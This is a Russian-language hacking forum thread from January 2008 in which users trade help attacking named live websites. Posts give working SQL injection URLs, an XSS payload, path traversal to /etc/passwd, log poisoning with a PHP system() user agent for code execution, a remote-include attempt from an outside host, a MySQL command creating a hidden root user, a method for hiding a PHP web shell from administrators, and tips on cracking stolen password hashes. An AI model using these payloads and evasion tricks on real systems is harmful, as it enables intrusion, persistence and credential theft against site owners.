Скажите, как можно, используя шелл, сделать возможность исполнять эти файлы из той папки в броузере?
Ищи в этой папке файл .htaccess , как найдёшь - выложи сюда содержимое(:

И ещё вопрос: как поменять через c99madshell время последнего изменения файла?
touch -t 200801131341 FILE.PHP

2008 - year
01 - month
13 - day
1341 - H:M

RekRut
13.01.2008, 16:21
Есть такая трабла, Mysql injection срабатывает после POST запроса и выдает следующее
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and b.science_category_id=1 and b.science_pubdate=1) inner join udb_science_c' at line 1


можно ли здесь что либо подобрать или нахимичить ??

keeberg
13.01.2008, 16:26
Тебе поможет фальсификатор пакетов InetCrack v1.39
Вот юзай наздаровье.... --> http://webfile.ru/1681376

RekRut
13.01.2008, 18:44
Тебе поможет фальсификатор пакетов InetCrack v1.39 Вот юзай наздаровье.... --> http://webfile.ru/1681376


ето я то знаю как запрос послать, проблема не в етом, я иммел ввиду, что можно ли тут подобрать количество колонок или нельзя ?? ну тоесть стандартным методом тут надо работать или как ??

fervex
14.01.2008, 02:00
Ищи в этой папке файл .htaccess , как найдёшь - выложи сюда содержимое(:


нет в этой папке такого файла :(

beng217
14.01.2008, 15:07
']Macro
Они не банят по ip.

beng217
Обратись в службу поддержки вм предварительно прочитав договор.

А есть ещё какой либо спосаб, если да то можете кинуть ссылку кде описывается как это можно сделать (я впервые сталкнулся с проблемой с IP)

Через анонимайзер и прокси не палучится т.к. я хочу зайти по лакальной сети т.к. это внутриний ресурс а через интернет зайти скйчас тоже можно

KIR@PRO
15.01.2008, 09:35
Помогите вот с этим :

MySQL error : You have an error in your SQL syntax near ''A variable type check failed, expecting G/INT for \"s\" : 20\' - /index.php?zh=' at line 1

URL: http://www.nu-44.ru/index.php?zh=topics&s=20'

и что можно получить из этого по максимуму.... тока не ломайте его он мне нужен рабочим плизззз

it's my
15.01.2008, 09:46
там фильтрация стоит навряд-ли, что можно сделать

KIR@PRO
15.01.2008, 12:54
Хорошо а тогда что мона с этим сделать???
_http://shop.winm.ru/index.php?productID=262'

ошибка:
You have an error in your SQL syntax near ''262''' at line 1 SQL query : SELECT categoryID FROM SS_products WHERE productID='262''

it's my
15.01.2008, 12:57
на тебе XSS'ку
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28% 22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0

KIR@PRO
15.01.2008, 16:46
На кой мне XSS я их итак тама сотними понаходил..... я же сказал мне надо сделать sql-inject

KIR@PRO
15.01.2008, 16:49
на тебе XSS'ку
http://shop.winm.ru/index.php?searchstring=%22%3E%3Cscript%3Ealert%28% 22XSS%22%29%3C%2Fscript%3E%3Cp+aling%22&x=0&y=0

темболее это именна та которую самой первой нашел после 5 минут на сайте.... я ж написал подскажите проявите себя нужна sql-инъекция

tusman
15.01.2008, 22:20
Народ как использовать данные уязвимости -
http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
Если можно то по подробней пожалуйста !
Спасибо !

+toxa+
15.01.2008, 23:32
там кодес типа

...
include($_GET['filename']);
...

посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить

удалённый инклуд не катит ибо так настроен сервер
http://www.planeta.ua/fc/template.php?filename=http://toxa.nov.ru/z.txt

tusman
16.01.2008, 00:56
посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить можно по подробней пожалуйста ! или где об этом можно почитать ?

noneim
16.01.2008, 13:33
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+GROUP+BY+1--

Вот эта инъёкция какая то странная... никак не могу врубится, почему не работают union, group by, и т.п., хотя через ; запросы выполняются

blackybr
16.01.2008, 13:38
неправда, селект работает http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'%20or%201=(select%20 1)--

fervex
17.01.2008, 01:17
Здравствуйте! :)

Подскажите, как можно закодировать .php файл с шеллом, чтобы сервер его исполнял, а админ не смог бы найти по названию функций и прочему тексту этот файл через поиск файлов в каталоге.

желательно, чтобы по словам eval(gzinflate(base64_decode(' он тоже не нашел этот файл.

Linux, Apache2
софт типа Zend Optimiser не стоит.

Спасибо! :)

+toxa+
17.01.2008, 02:36
собираешь код @include($_REQUEST[m]); в переменную в несколько этапов, разбросанных под коду и пропускаешь через preg_replace с модификатором e

KIR@PRO
17.01.2008, 03:03
пчочему то ругается на union просто на select и тому подобное...

http://shop.winm.ru/index.php?productID=262'

этот магазин не работает уже 2 года а сайт остался... я на нем тренируюсь он дырявый xss я нашел много теперь нашел ошибку в sql но немогу ее использовать...

Причем как то странно LIMIT работает: ( http://shop.winm.ru/index.php?productID=353+or+15+limit+3 ) а вот остально нет...

и еще один вопросик phpbb можно взломать не зарегистрировавшись??? а то тоже для жксперементов нашел не администрируемый и мертвый форум последнее обновление в 2005 г и там регистрация только с подтверждения админа... можно его както взломать?

могу адрес дать....

+toxa+
17.01.2008, 03:13
мускуль 3 ветки

KIR@PRO
17.01.2008, 03:17
я тебя немного не понял можешь обьяснить..... я понял то что нет инъекции но на будующее что значит в 3 ветки?

Basurman
17.01.2008, 03:29
в 3-ей ветке нет оператора union
можешь benchmark использовать...

http://localhost/test.php?id=1-benchmark(1000000,benchamrk(1000000, md5(current_time))), или

http://localhost/test2.php?order=(benchmark(1000000,benchamrk(10000 00, md5(current_time))))

Тупо вешает сервак (работает на 3-ке)

KIR@PRO
17.01.2008, 03:45
в 3-ей ветке нет оператора union
можешь benchmark использовать...


это как??? в первый раз слышу мне аж стыдно стало.... :(

обьясни пожайлуста...

я имею ввиду как benchmark использовать.... :confused: или ссылку дай где прочитать мона.... эсли не затруднит....

+toxa+
17.01.2008, 04:35
в 3-ей ветке нет оператора union
можешь benchmark использовать...
нуну, там ещё как бы подзапросов нет =\

KIR@PRO
17.01.2008, 04:42
нуну, там ещё как бы подзапросов нет =\

тоесть вообще ни как нельзя провести иньекцию???? :eek:

krypt3r
17.01.2008, 09:16
KIR@PRO, ознакомтесь
http://www.securitylab.ru/contest/212101.php

it's my
17.01.2008, 17:29
чего это такое?

hip-hop.ru/forum/ban.php?by=order%20by%201--

<!-- Database error in vBulletin 3.6.8: Invalid SQL: SELECT userid, adminid,bandate, liftdate, reason FROM userban WHERE liftdate > 0 ORDER BY order by 1-- ASC; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1-- ASC' at line 1 Error Number : 1064 Date : Thursday, January 17th 2008 @ 04:26:06 PM Script : http://hip-hop.ru/forum/ban.php?by=order%20by%201-- Referrer : IP Address : my_ip Username : my_nickname Classname : vB_Database -->

Macro
17.01.2008, 17:49
А это слепая инъекция

it's my
17.01.2008, 17:56
мну эта еще не проходил, дай мануал/статью

KIR@PRO
17.01.2008, 18:33
спасибо много нового узнал но так ни че с этим и не получилось я раззстроен... всем спасибо за помощь

Red_Red1
17.01.2008, 18:35
Не могу понять
http://www.federalspace.ru/DocDoSele.asp?DocID=46 это урл правильный
Пробую так http://www.federalspace.ru/DocDoSele.asp?DocID=46-1
Выдает значение эквивалентное http://www.federalspace.ru/DocDoSele.asp?DocID=45
Дополнительно пробую http://www.federalspace.ru/DocDoSele.asp?DocID=46+order+by+16-- - ОШИБКА! order+by+15-- ВСЕ НОРМАЛЬНО!
Делаю вывод что возможна скуль-иньект. Но выполнить иньекцию не выходит :( Почему так?
В других скриптах на этом сайте похожая ситуация.

Fata1ex
17.01.2008, 18:43
Ордер выдает что полей 15 а униону пофек ^^

A2GIL
18.01.2008, 00:53
Ага, там стоит старая бд! Так что придется делать инъект в слепую...
select то работает:
http://www.federalspace.ru/DocDoSele.asp?DocID=46%20and%201=(select 1)-- :)

Welemir
18.01.2008, 02:38
Собсна,вопрос: Как создать пользователя в бд с правами рута,если есть доступ к mysql.user?

Spyder
18.01.2008, 02:52
GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION

или

INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y");

Welemir
18.01.2008, 19:56
news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+P RIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"пароль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*

таг?) откуда столько Y :PP

blackybr
18.01.2008, 20:11
не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select

PunkAss
19.01.2008, 17:42
Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
там остаётся: ' order by blablabla
Другой комент /* выдаёт ошибку, # тоже не коментит =\

Например
sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATIO N_SCHEMA.TABLES%23
вызывает ошибку

Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark after the character string ' group by sender'.

т.е. строка получается:
INFORMATION_SCHEMA.TABLES#' group by sender'.
Можно это как-то обойти?

Macro
19.01.2008, 19:11
Можно. Просто сделать второй юнион :)

PunkAss
19.01.2008, 19:50
Можно. Просто сделать второй юнион :)
пробовал, но ещё бы я знал названия таблиц и колнок :confused:

Macro
19.01.2008, 20:14
пробовал, но ещё бы я знал названия таблиц и колнок :confused:
Ну information_schema должна быть.

script.asp?sender=1'%09union%09select%09*%09from%0 9information_schema.tables%09union%09select%09null

Что-то типа того

PunkAss
19.01.2008, 22:24
Что-то типа того
Блин, никак не канает :mad:
Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
=5'%09UNION%09SELECT%09sender%09FROM%09rating%09WH ERE%09'1'='1
ошибка:
Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос :(

Momiji
20.01.2008, 02:20
1.Как можно извернуться в случае если фильтруется (хз как назвать) слово select, как только пишешь в запрос
?id=6+union+select
сразу появляется:
Precondition Failed
The request was not completed due to preconditions that are set in the request header.

Preconditions prevent the requested method from being applied to a resource other than the one intended.

2. И что еще делать если отсутствуют выводимые поля?

Scipio
20.01.2008, 09:43
2Momiji

1. Не могу сказать точно, но думаю что на серваке стоит mod_security, если это так, то имхо бесполезно
2. почитай про Blind sql инъекции, на ачате полно статей и ответов на этот вопрос

2PunkAss

имхо фигню делаешь, кроме того что в mssql возможно разделение запросов, ты union select неправильно используешь, да и вобще, если очень надо кидай сюда ссыль посмотрим

PunkAss
20.01.2008, 10:48
http://cleverclub.nashe.ru/rating_d.asp?sender=1'

Да вся проблема правильно закончить свой запрос, чтобы в итоге общий был верный. Плохо скуль знаю, научите :p

Tyc00n
20.01.2008, 15:04
На некоторых фтп есть папка , _vti_pvt, там есть файл servise.psw , а нём логин и пароль, от чего они ?

Nea7
20.01.2008, 15:08
На некоторых фтп есть папка , _vti_pvt, там есть файл servise.psw , а нём логин и пароль, от чего они ?
FrontPage

Lesnoy_chelovek
20.01.2008, 15:46
Tyc00n, я хочу неменого уточнить ответ Nea7, там пароли от содениения с узлом с помощью FrontPage. То есть тебе достаточно их расшифровать и вставить в свою версию FP. Далее можешь спокойно логинится к сайту.

Fuckel
20.01.2008, 23:49
http://www.biotechcenter.org/include/down.php?filename=../../../../etc/passwd
как можно получить пассы если не получается залогиниться на сервере, расшифровать ))? что еще можно с этого взять?

Basurman
20.01.2008, 23:54
доступ к серверу.
Хеш типа MD5(unix) или MD5 freebsd
Подбирается при помощи PasswordsPro или John the Ripper

Fuckel
20.01.2008, 23:57
PasswordsPro если не ошибаюсь нужен словарь, да? а что еще можно выудить?

fobofob
21.01.2008, 00:07
У меня вопрос,как узнать название таблиц и,или колонок в бд sqlite,инъекция есть,вывод тоже,а вот дальше нифига не пойму что делать,подскажите плиз
код:
http://www.newusedcars.ru/?id=9836+union+select+1#

l-l00K
21.01.2008, 00:24
Предпологая что название таблиц можно посмотреть таким оброзом:
http://www.newusedcars.ru/?id=98360000+union+select+tbl_name+from+SQLITE_MAS TER--
а вообще как с ней работать смотри тут http://www.sqlite.org/

fobofob
21.01.2008, 00:38
Я так понял такой функции как information_schema в такой бд не используется?
А как составить запрос типа concat(table_name,0x3a,column_name) ?

Piflit
21.01.2008, 02:20
вопрос по mysql inj
в mysql есть функции concat и concat_ws.
CONCAT если увидит в скобках хоть одно NULL - она вернет NULL. Однако CONCAT_WS просто исключит из соединения NULL-значение.
в возвращаемых запросом данных есть null, но нужно, чтобы оно отображалось как null или просто пустое место, т.е. не игнорировалось. что можно сделать?